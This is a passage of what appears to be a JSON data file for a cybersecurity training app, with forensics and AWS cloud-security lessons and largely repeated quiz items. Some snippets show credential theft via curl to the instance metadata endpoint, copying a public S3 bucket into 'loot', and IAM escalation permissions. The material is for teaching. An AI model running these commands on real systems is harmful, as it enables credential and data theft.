records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"pcap-deep","cat":"Forensics & IR","title":"PCAP Deep Analysis","diff":2,"xp":150,"intro":"Extract from captures.","sections":[{"type":"text","content":"Extract from captures."},{"type":"code","lang":"bash","content":"tshark -r cap.pcap --export-objects http,exported/"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"File extraction option?","opts":["--filter","--export-objects","--decode","--extract"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"autopsy","cat":"Forensics & IR","title":"Autopsy Platform","diff":1,"xp":100,"intro":"GUI forensics.","sections":[{"type":"text","content":"GUI forensics."},{"type":"code","lang":"bash","content":"# Create case \u2192 Add source \u2192 Run ingest modules"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Autopsy is?","opts":["Scanner","Digital forensics platform","Cracker","Exploit framework"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"email-forensics","cat":"Forensics & IR","title":"Email Forensics","diff":2,"xp":125,"intro":"Trace email origins.","sections":[{"type":"text","content":"Trace email origins."},{"type":"code","lang":"bash","content":"# Check: Received, X-Originating-IP, Return-Path"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Sender IP header?","opts":["To","X-Originating-IP / Received","Subject","Date"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"sigma","cat":"Forensics & IR","title":"Sigma Detection Rules","diff":2,"xp":150,"intro":"Vendor-agnostic rules.","sections":[{"type":"text","content":"Vendor-agnostic rules."},{"type":"code","lang":"bash","content":"title: Suspicious PowerShell\ndetection:\n  selection:\n    ScriptBlockText|contains: 'Invoke-WebRequest'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Sigma special because?","opts":["Speed","Vendor-agnostic (converts to any SIEM)","Encrypted","Binary"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"aws-enum","cat":"Cloud & Container","title":"AWS Enumeration","diff":2,"xp":150,"intro":"Enumerate AWS services.","sections":[{"type":"text","content":"Enumerate AWS services."},{"type":"code","lang":"bash","content":"aws s3 ls s3://target --no-sign-request\naws iam list-users"},{"type":"text","content":"Cloud security is fundamentally about identity and access management. Unlike traditional networks where a firewall separates inside from outside, cloud environments are identity-perimeter: whoever has valid credentials can access resources from anywhere. Understanding IAM policies, service roles, and trust relationships is more important than network security in the cloud."},{"type":"tip","content":"When assessing cloud environments, always start with 'who am I and what can I do?' (sts get-caller-identity, az account show, gcloud auth list). Then enumerate what the identity can access. The most common cloud breaches come from overprivileged IAM roles, not sophisticated exploits."},{"type":"task","content":"Create a free-tier AWS account and intentionally misconfigure it: create a public S3 bucket, an overprivileged IAM user, and an EC2 instance with IMDSv1. Then use AWS CLI to discover and exploit each misconfiguration. Finally, fix them all and verify with ScoutSuite or Prowler."},{"type":"quiz","q":"No-auth AWS flag?","opts":["--anonymous","--no-sign-request","--public","--unauth"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"aws-meta","cat":"Cloud & Container","title":"AWS Metadata Exploit","diff":2,"xp":175,"intro":"Instance metadata theft.","sections":[{"type":"text","content":"Instance metadata theft."},{"type":"code","lang":"bash","content":"curl http://169.254.169.254/latest/meta-data/\ncurl http://169.254.169.254/latest/meta-data/iam/security-credentials/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS metadata IP?","opts":["10.0.0.1","169.254.169.254","192.168.1.1","127.0.0.1"],"ans":1},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"iam-privesc","cat":"Cloud & Container","title":"IAM Privilege Escalation","diff":3,"xp":200,"intro":"Escalate via IAM misconfigs.","sections":[{"type":"text","content":"Escalate via IAM misconfigs."},{"type":"code","lang":"bash","content":"# iam:CreatePolicyVersion \u2192 modify own policy\n# iam:AttachUserPolicy \u2192 attach admin\n# sts:AssumeRole \u2192 assume privileged role"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Policy self-modification?","opts":["s3:Get","iam:CreatePolicyVersion","ec2:Run","lambda:Invoke"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"s3-misconfig","cat":"Cloud & Container","title":"S3 Misconfiguration","diff":1,"xp":100,"intro":"Public S3 buckets.","sections":[{"type":"text","content":"Public S3 buckets."},{"type":"code","lang":"bash","content":"aws s3 ls s3://company-data --no-sign-request\naws s3 cp s3://company-data ./loot --recursive --no-sign-request"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Common S3 misconfig?","opts":["No encryption","Public read/write","Wrong region","No versioning"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage 